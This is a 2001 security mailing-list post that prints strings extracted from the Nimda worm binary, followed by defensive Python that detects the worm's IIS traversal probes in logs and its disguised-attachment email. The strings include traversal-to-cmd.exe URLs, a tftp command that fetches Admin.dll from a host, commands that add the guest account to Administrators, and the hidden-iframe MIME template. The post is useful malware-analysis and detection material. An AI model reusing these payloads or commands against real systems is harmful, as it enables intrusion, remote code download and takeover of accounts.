Security Incidents mailing list archives

Re: New worm? 'readme.eml'


From: Tony Abedini <tabedini () yahoo com>
Date: Tue, 18 Sep 2001 11:56:22 -0700 (PDT)

I've done a strings on the README.EXE file and I've
attached it AS TEXT for anyone who is interested!

!This program cannot be run in DOS mode.
O<Richq
.text
`.rdata
@.data
.rsrc
@.reloc
SVW3
WPWW
r?f
6VWh
X_^[
6SVWj
_^[u
_^[]
}VW
GGCC
GGCC
PSh?
SSSh
VSSS
PSSh@
PSSh@
VWh€
j@PW
69ut
X[_^
jcY;
6y.VW
6j@h
PQPW
Pj@VSW
PVSSW
6SSW
6_^3
SUVW
6_^]3
6WPWSh
WPWSh
WPWSh€
6VWS
6SShP
6VWS
6SSh0
6VWS
6SSh
6VWS
6SSh
6VWS
SPh|
6_^[
;H(}Rh
;A(}X
t0A;
\u"€}
Vh,
6_^[
SVWhD
H;L$
GY;~
9~ v
GY;~ r
QSPh
6PSj
;Et
X_^[
PVVh
X_^]
SUVW
_^][Y
SVWjY
X_^[
SVW3
Ph~f
VPVV
Ph~f
jc^W
2u€x
X_^[
D$u
D$<UP
D$@hx
D$`QPV
D$@P
D$@h
D$@h
D$@h
D$@h
D$@h
D$@h
D$@h
D$@P
D$@P
_]Vj
t`€e
@SVW
j@P3
F98t
C98u
WWW
|$$3
D$8WP
D$Dj
€|$<
D$\PWh0
D$\P
D$\h(
D$`YWPh
D$\h€
D$\WP
l$4uV
D$0j
|$0€
9T$,u<;
D$ ;
u>9T$
u89T$
u89T$
D$\P
F9T$
29T$
9T$ t
D$(u
D$\P
L$8j
QUPS
D$\P
t$(j
l$,UWjfj
D$\P
D$\P
D$TP
D$HP
D$TPU
D$ph
D$TP
D$HP
D$TPU
D$`VP
D$\P
_^][
YuOV
X_^[
SVWht
PSh0
YYSj&j
^VSP
6SSSSS
X_^[
6j.V
QQSV3
6VVj
s h€
X_^[
SUVW
t$@V
!SSj
_^][
6Wh (
6YWV
6t\h
6tUh(
6tyh
WVVV
6_^[
€8au
PVh?
VVVh8
PVVh
PVh?
WPWVh
WPWVh
6_^[
X_^[
PSh?
SSSh
PSSV
PWSV
PWSV
PWSh
6^9]
6_[t
D$@P
D$@hx
D$`QPV
D$@P
D$@h
D$@h
Yu:W
D$`QPV
WSSj
t7SV
SQWPV
<{}%<-~!</t
<@ufj
E€j@P
Ytg€}€@ta
E€VP
M€QP
6VuD
6YPS
€QVP
6j.V
Yv'€>Su"€~
th;Y sa
Yv:€>Su5€~
Mu/€~
Tu)€~
Pu#€~
^[WWW
6Wt|
SPSS
QSUV3
6uQUPP
6ubht
X_^][Y
6YSV
PVh0
_WVP
PVVVVV
X_^[
SVW
SVh0
YYVSh
VVj
t_VVh
tE95
PSh0
D$ SPh
D$ UP
D$ SP
6VSh0
6SUj
D$ P
D$ VP
D$$YP
6SUj
YPVW
X_^][
SUVW
6WUV
dWUV
D$`QPV
X_^][
X_^[
_WVP
PVVVVV
Yj&P
X_^[
^@[_
6j?P
PPh,o
QSPh
SVWj
VPVV
VPVV
6_^3
6u?h€
tWVS
NWVS
Eu
u7WPS
u&WVS
E_^[]
strncpy
memset
strcpy
strlen
strtok
memcpy
strchr
strcat
rand
strcmp
_strlwr
strncat
srand
free
sprintf
malloc
atoi
strstr
strrchr
MSVCRT.dll
_initterm
_adjust_fdiv
GetCurrentThreadId
CloseHandle
WriteFile
SetFilePointer
CreateFileA
MoveFileExA
ReadFile
SetFileAttributesA
FindClose
FindNextFileA
FindFirstFileA
WriteProcessMemory
OpenProcess
GetCurrentProcessId
lstrcmpiA
HeapCompact
Sleep
GetTickCount
SetThreadPriority
GetCurrentThread
CreateMutexA
lstrcpyA
GetComputerNameA
LocalFree
lstrlenA
LocalAlloc
CreateThread
ReleaseMutex
WaitForSingleObject
GetDriveTypeA
GetLogicalDrives
GetFileSize
CopyFileA
GetFileAttributesA
SetFileTime
GetFileTime
EndUpdateResourceA
UpdateResourceA
SizeofResource
LockResource
LoadResource
FindResourceA
FreeLibrary
BeginUpdateResourceA
LoadLibraryExA
DeleteFileA
GetTempFileNameA
CreateProcessA
GetModuleFileNameA
GetCurrentDirectoryA
GetCommandLineA
GetTempPathA
GetSystemDirectoryA
GetWindowsDirectoryA
GetModuleHandleA
GetVersionExA
GetProcAddress
LoadLibraryA
GetSystemTime
ExitProcess
HeapDestroy
GetLastError
HeapCreate
WritePrivateProfileStringA
KERNEL32.dll
RegCloseKey
RegQueryValueExA
RegOpenKeyExA
RegEnumKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegEnumValueA
RegSetValueExA
RegQueryValueA
ADVAPI32.dll
System\CurrentControlSet\Services\VxD\MSTCP
NameServer
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
Concept Virus(CV) V.5, Copyright(C)2001  R.P.China
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
--====_ABC1234567890DEF_====
NUL=
[rename]
\wininit.ini
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\*.*
€EXPLORER
fsdhqherwqi2001
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
HideFileExt
ShowSuperHidden
Hidden
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
\\%s
%ld %ld %ld
%ld %ld
Image Space Exec Write Copy
Image Space Exec Read/Write
Image Space Exec Read Only
Image Space Executable
Image Space Write Copy
Image Space Read/Write
Image Space Read Only
Image Space No Access
Mapped Space Exec Write Copy
Mapped Space Exec Read/Write
Mapped Space Exec Read Only
Mapped Space Executable
Mapped Space Write Copy
Mapped Space Read/Write
Mapped Space Read Only
Mapped Space No Access
Reserved Space Exec Write Copy
Reserved Space Exec Read/Write
Reserved Space Exec Read Only
Reserved Space Executable
Reserved Space Write Copy
Reserved Space Read/Write
Reserved Space Read Only
Reserved Space No Access
Process Address Space
Exec Write Copy
Exec Read/Write
Exec Read Only
Executable
Write Copy
Read/Write
Read Only
No Access
Image
User PC
Thread Details
ID Thread
Priority Current
Context Switches/sec
Start Address
Thread
Page Faults/sec
Virtual Bytes Peak
Virtual Bytes
Private Bytes
ID Process
Elapsed Time
Priority Base
Working Set Peak
Working Set
% User Time
% Privileged Time
% Processor Time
Process
Counter 009
software\microsoft\windows nt\currentversion\perflib\009
Counters
Version
Last Counter
software\microsoft\windows nt\currentversion\perflib
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
/Admin.dll
GET %s HTTP/1.0
Host: www
Connnection: close
readme
main
index
default
html
.asp
.htm
\readme.eml
.exe
winzip32.exe
riched20.dll
.nws
.eml
.doc
 .exe
dontrunold
ioctlsocket
gethostbyname
gethostname
inet_ntoa
inet_addr
ntohl
htonl
ntohs
htons
closesocket
select
sendto
send
recvfrom
recv
bind
connect
socket
__WSAFDIsSet
WSACleanup
WSAStartup
ws2_32.dll
MAPILogoff
MAPISendMail
MAPIFreeBuffer
MAPIReadMail
MAPIFindNext
MAPIResolveName
MAPILogon
MAPI32.DLL
WNetAddConnection2A
WNetCancelConnection2A
WNetOpenEnumA
WNetEnumResourceA
WNetCloseEnum
MPR.DLL
ShellExecuteA
SHELL32.DLL
RegisterServiceProcess
VirtualFreeEx
VirtualQueryEx
VirtualAllocEx
VirtualProtectEx
CreateRemoteThread
HeapCompact
HeapFree
HeapAlloc
HeapDestroy
HeapCreate
KERNEL32.DLL
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
Type
Remark
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\X$
Parm2enc
Parm1enc
Flags
Path
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares
Cache
Software\Microsoft\Windows\CurrentVersion\Explorer\MapMail
QUIT
Subject: 
From: <
DATA
RCPT TO: <
MAIL FROM: <
HELO 
aabbcc
 -dontrunold
NULL
\readme*.exe
admin.dll
qusery9bnow
 -qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe
octet
wwwwwp
pwlo
wwww
wwwwwwwwwwx
wwwwwwx
wwwwx
wwwx
lffffff
ffff
H|f
€ffff
CCCCCC
CCCCCCCCC
NPAD
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
%0C0Q0_0m0
1&1g1
2i2s2
2I3V3d3s3
4i5€5
6Y6~6
7.7H7{7
8>8J8`8e8
9!9@9W9
:!:[:d:o:
;O;U;k;
<&=2=8=E=O=^=j=
=>">)>.>E>^>
?)?0?5?@?M?T?]?|?
0'0/0C0
1!1*111:1A1J1Y1q1v1}1
1'2K2
3-343S3a3
4.494?4Q4Y4c4o4u4|4
5,515D5I5Z5_5p5u5
6,616D6I6Y6^6o6€6
7&7+7>7C7S7X7h7m7}7
8(8-8@8E8U8Z8j8o8
9*9/9B9G9W9\9l9q9
;8;A;_;h;v;
<T<d<
2>U>~>
?!?(?/?Q?X?q?
0'030?0X0}0
2<2W2t2
203I3k3~3
4+464B4U4{4
45,5>5P5b5q5
5.646H6g6n6}6
7?7Q7V7
8!8-8:8F8L8q8
929D9O9T9Z9m9v9
<5<?<M<`<f<y<
=2=O=h=
">,>@>Q>W>i>v>
?&?6?W?u?
0.0;0R0v0
02171=1Q1W1d1o1v1
2+20262A2U2`2
2.3?3V3\3k3
4$494K4a4v4
5.575J5P5u5{5
6F6k6
777}7
8-848A8N8g8w8
9 9(9-9<9D9P9X9d9l9y9
9":3:=:B:K:W:\:d:i:o:v:{:
;#;(;1;?;G;L;U;\;d;i;o;v;{;
<#<(<.<5<:<C<N<V<[<a<h<m<s<z<
=!='=.=3=9=@=E=K=R=W=]=d=i=o=v={=
.>J>v>
?.?J?\?m?
:0E0Z0x0
1)1D1{1
2&272M2d2
4!4*4@4F4O4
5-5B5R5[5o5y5
6&6I6S6e6€6
707b7
8%8:8E8R8
9*979P9p9
:7:=:F:N:X:a:m:u:|:
;;;L;o;
<N<Y<k<
=N=y=
+>1>Q>^>f>l>w>
?5?>?W?_?p?
141N1W1
1b2{2
3.3^3d3k3
41474B4H4V4^4e4j4p4
5)5>5F5R5Z5i5v5|5
6!6n6
7)757X7m7x7
8;8F8K8R8W8]8c8
9 9F9L9[9d9v9€9
;(;8;>;m;
<!<.<9<@<_<q<
=+=1=y=
V>\>r>x>
?#?;?B?M?T?z?
0v0~0
1 1'141K1d1j1~1
1#2B2`2t2
3%373I3t3{3
4 4+484@4N4S4X4]4h4u4
465R5

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
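
The URL fragments in the strings above (/scripts/..%255c.., /scripts/..%c0%af.., ..%c1%1c.., /root.exe?/c+, /winnt/system32/cmd.exe?/c+ and the tftp ... GET Admin.dll command line) are the directory-traversal encodings IIS mishandled: overlong UTF-8 sequences (MS00-078) and double percent-encoding (MS01-026). The following is an added example, not code from the post, showing how to recognise them in web-server logs: it decodes each request path the way the lenient server decoder did and reports which decoding pass exposes the traversal. The IIS-style log lines are constructed, and the two-byte decoding rule is a model of that decoder (an assumption), not IIS code.

```python
"""Flag the IIS probes whose URL fragments appear in the strings dump
(..%255c.., ..%c0%af.., ..%c1%1c.., root.exe, cmd.exe?/c+, tftp GET Admin.dll)
in IIS-style log lines.  Added example, not code from the post."""
import re
from typing import List, Tuple

_HEX2 = re.compile(r"[0-9A-Fa-f]{2}")


def decode_once(text: str) -> str:
    """One pass of percent-decoding, deliberately lenient in two ways.

    1. A malformed escape ('%%', '%5', '%zz') is kept as a literal '%', so
       '..%%35%63..' leaves the first pass as '..%5c..' and only the second
       pass turns it into '..\\..' (the double-decode trick).
    2. A lead byte 0xC0/0xC1 is merged with whatever byte follows as
       ((lead & 0x1F) << 6) | (next & 0x3F) with no check that 'next' is a
       continuation byte.  That rule (assumed here as a model of the decoder
       the dump's strings target) maps %c0%af and %c0%2f to '/', and %c1%9c
       and %c1%1c to '\\'.
    """
    raw: List[int] = []
    i = 0
    while i < len(text):
        if text[i] == "%" and _HEX2.fullmatch(text[i + 1:i + 3]):
            raw.append(int(text[i + 1:i + 3], 16))
            i += 3
        else:
            raw.append(ord(text[i]))
            i += 1
    out: List[str] = []
    i = 0
    while i < len(raw):
        lead = raw[i]
        if lead in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(chr(((lead & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(lead))
            i += 1
    return "".join(out)


def escapes_root(path: str) -> bool:
    """True if a '..' segment climbs above the web root.  Both '/' and '\\'
    split segments because IIS accepts either separator."""
    depth = 0
    for seg in re.split(r"[\\/]+", path):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def inspect_request(stem: str, query: str) -> List[str]:
    """Indicators for one request: which decode pass exposes the traversal,
    whether it targets cmd.exe or a root.exe copy, and whether the command
    line pulls Admin.dll over tftp."""
    tags: List[str] = []
    once = decode_once(stem)
    twice = decode_once(once)
    if escapes_root(once):
        tags.append("traversal-single-decode")
    elif escapes_root(twice):
        tags.append("traversal-double-decode")
    target = twice.lower().replace("\\", "/")
    if target.endswith("/cmd.exe"):
        tags.append("cmd.exe")
    if target.endswith("/root.exe"):
        tags.append("root.exe")
    if query != "-":
        args = decode_once(decode_once(query)).lower()
        if "tftp" in args:
            tags.append("tftp")
        if "admin.dll" in args:
            tags.append("admin.dll")
    return tags


def scan_log(text: str) -> List[Tuple[str, str, List[str]]]:
    """Parse 'date time client method uri-stem uri-query status' lines (a
    constructed, simplified W3C-style layout) and return the flagged ones."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue
        client, stem, query = fields[2], fields[4], fields[5]
        tags = inspect_request(stem, query)
        if tags:
            hits.append((client, stem, tags))
    return hits


# Constructed sample: five probes built from the dump's URL fragments plus
# two benign requests.  Not a real capture.
SAMPLE_LOG = """\
2001-09-18 12:00:01 10.0.0.5 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 12:00:02 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2001-09-18 12:00:03 10.0.0.5 GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 12:00:04 10.0.0.5 GET /scripts/root.exe /c+dir 200
2001-09-18 12:00:05 10.0.0.5 GET /scripts/..%%35%63../winnt/system32/cmd.exe /c+tftp%20-i%2010.0.0.5%20GET%20Admin.dll%20c:\\Admin.dll 200
2001-09-18 12:00:06 10.0.0.9 GET /default.htm - 200
2001-09-18 12:00:07 10.0.0.9 GET /images/logo%20small.gif - 200
"""

if __name__ == "__main__":
    for client, stem, tags in scan_log(SAMPLE_LOG):
        print(client, stem, ", ".join(tags))
```

Run as a script to print the flagged lines. Note that a plain `unquote()` would not catch the `%c1%1c` form at all (0x1C is not a continuation byte) and would catch `%%35%63` only if applied twice; modelling the broken decoder, rather than decoding correctly, is what makes the check match what the server actually did.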

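The MIME template in the dump (a multipart/related message whose HTML part holds a zero-sized iframe pointing at cid:EA4DMGBP9p, and whose readme.exe part is declared audio/x-wav) is the shape that got attachments executed automatically by unpatched Outlook Express and Internet Explorer (MS01-020). The following is an added example, not code from the post, that parses such a message with Python's email module and reports the indicators: a hidden iframe loading a cid: part, an executable filename under a non-executable media type, and an MZ header in the decoded payload. SAMPLE_EML is constructed from the template's headers with a stand-in payload, not the worm's bytes.

```python
"""Inspect a MIME message for the two tricks in the readme.eml template in the
dump: a zero-sized iframe pointing at a cid: part, and a part declared
audio/x-wav whose name (readme.exe) and payload (MZ header) say it is a
Windows executable.  Added example; SAMPLE_EML is constructed from the
template's headers with a stand-in payload, not the worm's bytes."""
import base64
import re
from email import message_from_string
from email.message import Message
from typing import List, Tuple

EXEC_EXTS = (".exe", ".com", ".scr", ".pif", ".bat", ".dll")

# Stand-in payload: an 'MZ' signature followed by text, not a real PE image.
_STUB_B64 = base64.b64encode(b"MZ\x90\x00stand-in payload, not a program").decode()

SAMPLE_EML = (
    "MIME-Version: 1.0\n"
    "Content-Type: multipart/related;\n"
    '\ttype="multipart/alternative";\n'
    '\tboundary="====_ABC1234567890DEF_===="\n'
    "X-Priority: 3\n"
    "X-MSMail-Priority: Normal\n"
    "X-Unsent: 1\n"
    "\n"
    "--====_ABC1234567890DEF_====\n"
    "Content-Type: multipart/alternative;\n"
    '\tboundary="====_ABC0987654321DEF_===="\n'
    "\n"
    "--====_ABC0987654321DEF_====\n"
    "Content-Type: text/html;\n"
    '\tcharset="iso-8859-1"\n'
    "Content-Transfer-Encoding: quoted-printable\n"
    "\n"
    "<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>\n"
    "<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>\n"
    "</iframe></BODY></HTML>\n"
    "--====_ABC0987654321DEF_====--\n"
    "--====_ABC1234567890DEF_====\n"
    "Content-Type: audio/x-wav;\n"
    '\tname="readme.exe"\n'
    "Content-Transfer-Encoding: base64\n"
    "Content-ID: <EA4DMGBP9p>\n"
    "\n"
    + _STUB_B64 + "\n"
    "--====_ABC1234567890DEF_====--\n"
)


def hidden_cid_iframes(html: str) -> List[str]:
    """Content-IDs referenced by iframes that are collapsed to zero size."""
    found: List[str] = []
    for m in re.finditer(r"<iframe\b([^>]*)>", html, re.I):
        attrs = m.group(1)
        src = re.search(r'src\s*=\s*"?cid:([^"\s>]+)', attrs, re.I)
        zero = re.search(r'\b(?:height|width)\s*=\s*"?0\b', attrs, re.I)
        if src and zero:
            found.append(src.group(1))
    return found


def inspect_message(raw: str) -> List[str]:
    """Return indicator strings for a raw RFC 822 message (empty if clean)."""
    msg = message_from_string(raw)
    hidden: List[str] = []
    leaves: List[Tuple[str, Message]] = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        if part.get_content_type() == "text/html":
            charset = part.get_content_charset() or "iso-8859-1"
            html = (part.get_payload(decode=True) or b"").decode(charset, "replace")
            hidden += hidden_cid_iframes(html)
        else:
            leaves.append(((part.get("Content-ID") or "").strip("<>"), part))
    findings: List[str] = []
    for cid, part in leaves:
        name = (part.get_filename() or "").lower()   # falls back to the name= param
        ctype = part.get_content_type()
        body = part.get_payload(decode=True) or b""  # base64/QP decoded bytes
        if name.endswith(EXEC_EXTS) and not ctype.startswith("application/"):
            findings.append(f"type-mismatch:{ctype}:{name}")
        if body[:2] == b"MZ":
            findings.append(f"mz-header:{name}")
        if cid and cid in hidden:
            findings.append(f"hidden-iframe-loads:{cid}:{name}")
    return findings


if __name__ == "__main__":
    for finding in inspect_message(SAMPLE_EML):
        print(finding)
```

The three checks are deliberately independent: a mail filter that only trusts the declared Content-Type would pass this message as a sound file, so the filename extension and the first two bytes of the decoded body are each inspected on their own.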